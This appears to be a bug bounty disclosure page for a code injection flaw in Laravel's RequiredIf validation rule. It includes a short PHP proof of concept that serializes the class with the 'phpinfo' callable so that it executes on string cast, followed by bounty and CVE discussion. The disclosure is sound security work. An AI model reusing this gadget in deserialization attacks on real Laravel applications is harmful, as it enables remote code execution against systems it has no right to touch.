Code Injection in laravel/framework

Valid

Reported on

Jun 12th 2021


✍️ Description

Function injection in Illuminate\Validation\Rules\RequiredIf can be exploited to generate gadget chains for deserialization vulnerabiltiies.

🕵️‍♂️ Proof of Concept

<?php
use Illuminate\Validation\Rules\RequiredIf;

require("vendor/autoload.php");

$gadget = serialize(new RequiredIf("phpinfo"));

echo unserialize($gadget); // exploitation

As soon as the object is casted to string, function phpinfo gets executed.

💥 Impact

This vulnerability is capable of calling callables and can be utilized in POP gadget chains when exploiting deserialization vulnerabilities.

0xcrypto modified the report
a year ago
0xcrypto submitted a
a year ago
Jamie Slome
a year ago

Admin


@taylorotwell, can you just confirm that this report is valid?

Jamie Slome validated this vulnerability a year ago
0xcrypto has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on 814d6b a year ago
0xcrypto has been awarded the fix bounty
0xcrypto
a month ago

Researcher


@jamieslome is it possible to get CVE on this one?

Jamie Slome
a month ago

Admin


@0xcrypto - we would first require the go-ahead from the maintainer before assigning a CVE here 👍

to join this conversation